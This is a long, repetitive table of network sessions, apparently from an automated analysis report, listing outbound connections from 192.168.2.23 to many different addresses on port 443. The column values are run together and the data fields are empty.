                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9941192.168.2.2345746106.0.64.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9942192.168.2.234318473.29.231.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9943192.168.2.2347738194.153.152.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9944192.168.2.2342216136.160.140.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9945192.168.2.233749660.254.212.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9946192.168.2.2343372157.51.66.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9947192.168.2.235016467.176.177.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9948192.168.2.2336464220.255.242.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9949192.168.2.2335508131.178.239.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9950192.168.2.2348222173.231.187.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9951192.168.2.235795243.241.77.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9952192.168.2.2347634107.0.96.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9953192.168.2.2352514112.47.230.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9954192.168.2.2346368114.175.41.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9955192.168.2.233518671.57.179.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9956192.168.2.2336250123.180.70.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9957192.168.2.23459861.157.37.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9958192.168.2.234413650.253.42.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9959192.168.2.2343548178.244.171.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9960192.168.2.2334470206.151.138.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9961192.168.2.233971287.122.246.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9962192.168.2.2342512136.184.54.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9963192.168.2.23425869.149.226.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9964192.168.2.2336892177.248.66.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9965192.168.2.234545299.61.229.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9966192.168.2.236011025.180.131.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9967192.168.2.2355040146.172.17.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9968192.168.2.23482781.0.232.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9969192.168.2.2349490178.154.67.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9970192.168.2.233923832.41.34.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9971192.168.2.233584039.135.71.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9972192.168.2.235376036.136.53.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9973192.168.2.233320654.232.117.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9974192.168.2.233969036.80.73.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9975192.168.2.233799649.174.255.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9976192.168.2.235425875.226.248.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9977192.168.2.233882438.56.69.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9978192.168.2.2347724147.173.41.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9979192.168.2.2338352202.248.67.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9980192.168.2.233612081.52.50.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9981192.168.2.2351592202.189.204.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9982192.168.2.2359682218.229.195.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9983192.168.2.2336428153.98.130.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9984192.168.2.2359648201.159.36.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9985192.168.2.234905458.64.50.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9986192.168.2.234714098.18.250.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9987192.168.2.235465683.172.87.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9988192.168.2.2357186107.7.11.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9989192.168.2.2333518136.45.110.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9990192.168.2.2351380161.134.31.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9991192.168.2.2348886218.208.95.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9992192.168.2.2354794166.35.174.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9993192.168.2.236027658.152.53.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9994192.168.2.2340904102.186.247.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9995192.168.2.234699854.52.54.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9996192.168.2.234514444.254.109.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9997192.168.2.2345528207.112.95.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9998192.168.2.2349338121.74.100.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9999192.168.2.2339314208.16.199.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10000192.168.2.2359508194.46.203.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10001192.168.2.2350692101.122.96.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10002192.168.2.2338598145.159.169.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10003192.168.2.234560636.235.155.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10004192.168.2.2355200170.185.156.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10005192.168.2.2356988144.47.179.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10006192.168.2.233729825.196.71.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10007192.168.2.234186243.208.120.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10008192.168.2.2354338192.37.155.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10009192.168.2.235417893.220.235.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10010192.168.2.2353218170.206.135.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10011192.168.2.233616253.179.162.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10012192.168.2.2353900192.77.238.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10013192.168.2.2350200131.185.10.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10014192.168.2.2337814197.173.178.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10015192.168.2.236024417.249.38.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10016192.168.2.234562631.147.200.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10017192.168.2.2340594217.37.23.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10018192.168.2.2353052146.18.172.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10019192.168.2.233767824.58.124.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10020192.168.2.2356492212.218.155.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10021192.168.2.2347272114.40.70.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10022192.168.2.234411462.47.118.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10023192.168.2.2356830189.144.39.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10024192.168.2.234378446.16.96.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10025192.168.2.2341044133.186.6.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10026192.168.2.2357946160.97.108.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10027192.168.2.2356182191.82.95.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10028192.168.2.235059847.136.173.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10029192.168.2.2351446109.129.73.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10030192.168.2.2343666185.174.104.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10031192.168.2.2336684207.94.41.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10032192.168.2.2346742147.129.31.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10033192.168.2.2360806158.254.53.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10034192.168.2.233529220.66.175.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10035192.168.2.234800470.135.63.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10036192.168.2.235939857.0.222.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10037192.168.2.2336410140.211.45.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10038192.168.2.2354058200.41.160.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10039192.168.2.234644866.148.38.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10040192.168.2.2351982131.244.69.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10041192.168.2.235949465.165.105.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10042192.168.2.235350680.136.246.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10043192.168.2.2332986162.72.183.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10044192.168.2.2360778185.201.179.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10045192.168.2.2356526183.82.253.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10046192.168.2.235047093.195.20.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10047192.168.2.2352178126.118.21.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10048192.168.2.2352690198.162.16.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10049192.168.2.23374281.99.58.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10050192.168.2.2340656136.157.241.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10051192.168.2.2347920123.167.97.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10052192.168.2.2359954153.172.209.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10053192.168.2.234227252.225.75.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10054192.168.2.235531240.244.193.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10055192.168.2.2347588158.173.231.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10056192.168.2.2349192184.203.133.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10057192.168.2.234522660.30.107.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10058192.168.2.2353672138.70.26.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10059192.168.2.2343450141.138.197.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10060192.168.2.2354220157.202.142.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10061192.168.2.234831286.31.56.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10062192.168.2.235583668.30.37.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10063192.168.2.2347412133.43.117.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10064192.168.2.235966025.131.83.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10065192.168.2.234643098.205.241.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10066192.168.2.2348138220.254.162.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10067192.168.2.2353632108.124.100.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10068192.168.2.2358462182.69.159.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10069192.168.2.234505249.187.110.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10070192.168.2.2351930158.131.48.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10071192.168.2.234375469.76.158.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10072192.168.2.234247660.101.23.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10073192.168.2.2343482116.241.9.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10074192.168.2.235148052.9.69.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10075192.168.2.2340516209.28.3.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10076192.168.2.2360948191.138.94.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10077192.168.2.2347020197.252.13.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10078192.168.2.2349632147.50.133.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10079192.168.2.2345160141.106.92.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10080192.168.2.23515961.164.114.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10081192.168.2.233383836.83.46.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10082192.168.2.23436922.147.157.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10083192.168.2.2358278179.46.137.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10084192.168.2.2334596116.44.207.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10085192.168.2.235598045.142.11.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10086192.168.2.234013275.241.245.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10087192.168.2.2360586193.97.102.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10088192.168.2.2347048180.48.97.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10089192.168.2.2355026158.5.167.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10090192.168.2.2335528196.46.135.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10091192.168.2.235507636.215.46.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10092192.168.2.233536247.133.116.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10093192.168.2.233991640.102.163.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10094192.168.2.2334544134.208.149.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10095192.168.2.23577688.224.189.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10096192.168.2.2352120145.119.5.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10097192.168.2.2354044192.196.4.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10098192.168.2.235522098.244.156.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10099192.168.2.2354140114.35.25.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10100192.168.2.235075614.6.43.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10101192.168.2.2345602174.242.150.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10102192.168.2.234700436.24.234.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10103192.168.2.235084264.105.140.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10104192.168.2.235946632.230.66.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10105192.168.2.2348786196.252.223.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10106192.168.2.2352212116.152.125.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10107192.168.2.2343616122.230.220.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10108192.168.2.2353774139.63.111.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10109192.168.2.2341728217.254.47.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10110192.168.2.2333370150.144.45.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10111192.168.2.2355320216.80.235.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10112192.168.2.235950074.105.254.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10113192.168.2.233472287.167.40.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10114192.168.2.2336946163.149.210.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10115192.168.2.2347590131.209.148.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10116192.168.2.2341970100.207.169.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10117192.168.2.233305423.206.191.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10118192.168.2.2358066216.88.19.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10119192.168.2.234607858.249.44.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10120192.168.2.233688694.90.119.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10121192.168.2.2357996197.55.139.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10122192.168.2.2360130216.119.242.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10123192.168.2.2355578159.164.44.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10124192.168.2.2351446206.192.53.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10125192.168.2.2337298102.189.112.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10126192.168.2.23460445.47.219.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10127192.168.2.2358350143.140.205.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10128192.168.2.233963697.216.20.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10129192.168.2.2348600118.232.36.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10130192.168.2.2351738168.183.94.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10131192.168.2.235555862.176.37.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10132192.168.2.235122690.80.179.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10133192.168.2.234915258.3.93.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10134192.168.2.235437471.228.107.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10135192.168.2.2341884120.16.16.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10136192.168.2.233828032.116.247.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10137192.168.2.2341138189.87.148.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10138192.168.2.2337468221.242.204.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10139192.168.2.2354260189.182.67.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10140192.168.2.235721454.86.202.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10141192.168.2.2340068203.129.37.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10142192.168.2.2335180141.40.137.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10143192.168.2.2338926208.62.84.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10144192.168.2.2347392104.176.64.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10145192.168.2.235922288.251.170.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10146192.168.2.234967482.98.128.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10147192.168.2.2336666183.108.103.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10148192.168.2.234099899.37.139.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10149192.168.2.23541801.41.248.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10150192.168.2.2345506186.197.186.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10151192.168.2.233634461.119.139.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10152192.168.2.23462001.184.249.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10153192.168.2.236029867.193.33.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10154192.168.2.233575867.33.140.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10155192.168.2.2334118122.37.212.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10156192.168.2.234026885.185.12.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10157192.168.2.2340806199.189.61.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10158192.168.2.2341634165.87.236.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10159192.168.2.234201282.245.36.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10160192.168.2.2337330160.118.42.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10161192.168.2.233306693.161.213.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10162192.168.2.2335176136.11.31.98443
